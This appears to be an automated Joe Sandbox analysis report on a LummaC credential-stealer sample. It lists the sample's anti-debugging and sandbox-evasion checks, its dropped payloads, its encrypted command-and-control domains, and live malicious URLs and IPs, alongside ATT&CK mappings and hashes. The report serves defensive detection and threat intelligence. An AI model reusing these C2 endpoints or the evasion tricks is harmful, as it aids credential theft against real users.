Source: E205fJJS1Q.exe, 00000000.00000002.1716041787.0000000001676000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Set-up.exe, 00000002.00000003.1964808056.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966246303.00000000007B8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964972795.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964681813.000000000079C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1965027429.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

API call chain: ExitProcess graph end node

graph_1-12971

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	File opened: NTICE
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	File opened: SICE
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe

Code function: 1_2_00F1BAD0 LdrInitializeThunk,

1_2_00F1BAD0

Source: C:\Users\user\Desktop\E205fJJS1Q.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.0000000006B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: bashfulacid.lat
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.0000000006B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tentabatte.lat
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.0000000006B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: curverpluch.lat
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.0000000006B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: talkynicer.lat
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.0000000006B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: shapestickyr.lat
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.0000000006B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: manyrestro.lat
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.0000000006B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: slipperyloo.lat
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.0000000006B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: wordyfindy.lat
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.0000000006B45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: censeractersj.click

Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process created: C:\Users\user\AppData\Local\Temp\LummaC2.exe "C:\Users\user\AppData\Local\Temp\LummaC2.exe"			Jump to behavior
Source: C:\Users\user\Desktop\E205fJJS1Q.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"			Jump to behavior

Source: E205fJJS1Q.exe, E205fJJS1Q.exe, 00000000.00000002.1716041787.0000000001676000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: #"Program Manager

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: procmon.exe
Source: E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.4:49732 -> 185.121.15.192:80

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	12 Process Injection	1 Masquerading	OS Credential Dumping	841 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	12 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	261 Virtualization/Sandbox Evasion	Security Account Manager	261 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	214 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
E205fJJS1Q.exe	55%	ReversingLabs	Win32.Exploit.LummaC
E205fJJS1Q.exe	100%	Avira	HEUR/AGEN.1313526
E205fJJS1Q.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\LummaC2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\LummaC2.exe	55%	ReversingLabs	Win32.Trojan.MintZard
C:\Users\user\AppData\Local\Temp\Set-up.exe	26%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	100%	Avira URL Cloud	malware
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse	100%	Avira URL Cloud	malware
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	100%	Avira URL Cloud	malware
censeractersj.click	0%	Avira URL Cloud	safe
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1	100%	Avira URL Cloud	malware
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	100%	Avira URL Cloud	malware
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.fortth14ht.top	185.121.15.192	true	false		high
httpbin.org	3.218.7.103	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	true	Avira URL Cloud: malware	unknown
wordyfindy.lat	false		high
curverpluch.lat	false		high
slipperyloo.lat	false		high
tentabatte.lat	false		high
manyrestro.lat	false		high
bashfulacid.lat	false		high
censeractersj.click	true	Avira URL Cloud: safe	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	true	Avira URL Cloud: malware	unknown
shapestickyr.lat	false		high
https://httpbin.org/ip	false		high
talkynicer.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://curl.se/docs/hsts.html	Set-up.exe.0.dr	false		high
http://html4/loose.dtd	E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://httpbin.org/ipbefore	E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://curl.se/docs/http-cookies.html	E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Set-up.exe.0.dr	false	Avira URL Cloud: malware	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1	Set-up.exe, 00000002.00000003.1965076870.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964808056.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964972795.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964681813.000000000079C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966222190.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Set-up.exe, 00000002.00000002.1966840568.0000000000D69000.00000004.00000001.01000000.00000008.sdmp	false	Avira URL Cloud: malware	unknown
https://curl.se/docs/alt-svc.html	Set-up.exe.0.dr	false		high
http://.css	E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://.jpg	E205fJJS1Q.exe, 00000000.00000002.1717966689.000000000774F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966862690.0000000000D6B000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003lse	Set-up.exe, 00000002.00000003.1965076870.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964808056.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964972795.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1964681813.000000000079C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1966222190.00000000007A9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.121.15.192	home.fortth14ht.top	Spain		207046	REDSERVICIOES	false
3.218.7.103	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581406
Start date and time:	2024-12-27 15:06:42 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	E205fJJS1Q.exe renamed because original name is a hash value
Original Sample Name:	5b8011576b37d84db9122786cded9f55.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@5/3@8/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 172.202.163.200, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target E205fJJS1Q.exe, PID 7320 because it is empty
Execution Graph export aborted for target Set-up.exe, PID 7532 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: E205fJJS1Q.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.121.15.192	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
3.218.7.103	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse
	OoYYtngD7d.exe	Get hash	malicious	Unknown	Browse
	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse
	qZA8AyGxiA.exe	Get hash	malicious	Unknown	Browse
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	OoYYtngD7d.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	NWJ4JvzFcs.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	EwhnoHx0n5.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	PqHnYMj5eF.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
home.fortth14ht.top	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	w22319us3M.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse	3.218.7.103
	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	5uVReRlvME.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, Stealc	Browse	34.226.108.155
	db0fa4b8db0333367e9bda3ab68b8042.i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	34.195.210.183
	OoYYtngD7d.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
REDSERVICIOES	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	185.121.15.192

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\Set-up.exe	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Temp\LummaC2.exe	QzK1LCSuq2.exe	Get hash	malicious	LummaC	Browse
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse
	YrxiR3yCLm.exe	Get hash	malicious	LummaC	Browse
	Cph7VEeu1r.exe	Get hash	malicious	LummaC	Browse
	3stIhG821a.exe	Get hash	malicious	LummaC	Browse
	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\E205fJJS1Q.exe.log

Download File

Process:	C:\Users\user\Desktop\E205fJJS1Q.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\LummaC2.exe

Download File

Process:	C:\Users\user\Desktop\E205fJJS1Q.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	299520
Entropy (8bit):	6.860310132420335
Encrypted:	false
SSDEEP:	6144:R5s/zt4HV88/rCatOZFABeDUbLv0uC8r9qMq2E9ND43F+ZnSi4:8rtsVPrNMG9qwENs8ZJ4
MD5:	607000C61FCB5A41B8D511B5ED7625D4
SHA1:	DFAA2BFEA8A51B14AC089BB6A39F037E769169D1
SHA-256:	C9831759E15B3A52238C03D0D51DB9DE0C1A6C7A61A51DE72C5869061172E9DB
SHA-512:	64940F02635CCBC2DCD42449C0C435A6A50BD00FA93D6E2E161371CDC766103EF858CCBAAE4497A75576121EA7BC25BA54A9064748F9D6676989A4C9F8B50E58
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Joe Sandbox View:	Filename: QzK1LCSuq2.exe, Detection: malicious, Browse Filename: OAKPYEH4c6.exe, Detection: malicious, Browse Filename: YrxiR3yCLm.exe, Detection: malicious, Browse Filename: Cph7VEeu1r.exe, Detection: malicious, Browse Filename: 3stIhG821a.exe, Detection: malicious, Browse Filename: DRWgoZo325.exe, Detection: malicious, Browse Filename: 8wiUGtm9UM.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...xZig............................ .............@..........................P............@.....................................................................(9...................................................................................text............................... ..`.rdata... ......."..................@..@.data...L....0...P..................@....reloc..(9.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Set-up.exe

Download File

Process:	C:\Users\user\Desktop\E205fJJS1Q.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6851208
Entropy (8bit):	6.451509958428788
Encrypted:	false
SSDEEP:	98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
MD5:	2A99036C44C996CEDEB2042D389FE23C
SHA1:	4F1E624BCC030E44722DE26B72C8156BF57E14E8
SHA-256:	73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
SHA-512:	6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Joe Sandbox View:	Filename: QzK1LCSuq2.exe, Detection: malicious, Browse Filename: OAKPYEH4c6.exe, Detection: malicious, Browse Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse Filename: YrxiR3yCLm.exe, Detection: malicious, Browse Filename: Cph7VEeu1r.exe, Detection: malicious, Browse Filename: 3stIhG821a.exe, Detection: malicious, Browse Filename: DRWgoZo325.exe, Detection: malicious, Browse Filename: 8wiUGtm9UM.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.984363447974269
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	E205fJJS1Q.exe
File size:	6'196'224 bytes
MD5:	5b8011576b37d84db9122786cded9f55
SHA1:	19cfa391040bae58c5d623f5515e1505996fe646
SHA256:	7039e6fb048b2a7511b7095958332a7300cc42e66142b4c815f18cd02b6f1b69
SHA512:	5eb25ca3129aa9ec0352864d8717355230bc9bbcb0a0c271197c2a4f6c72ef16c092772317440461e1d24d77fe3cafd5d1ab191d9e65690b18f8240fbd279021
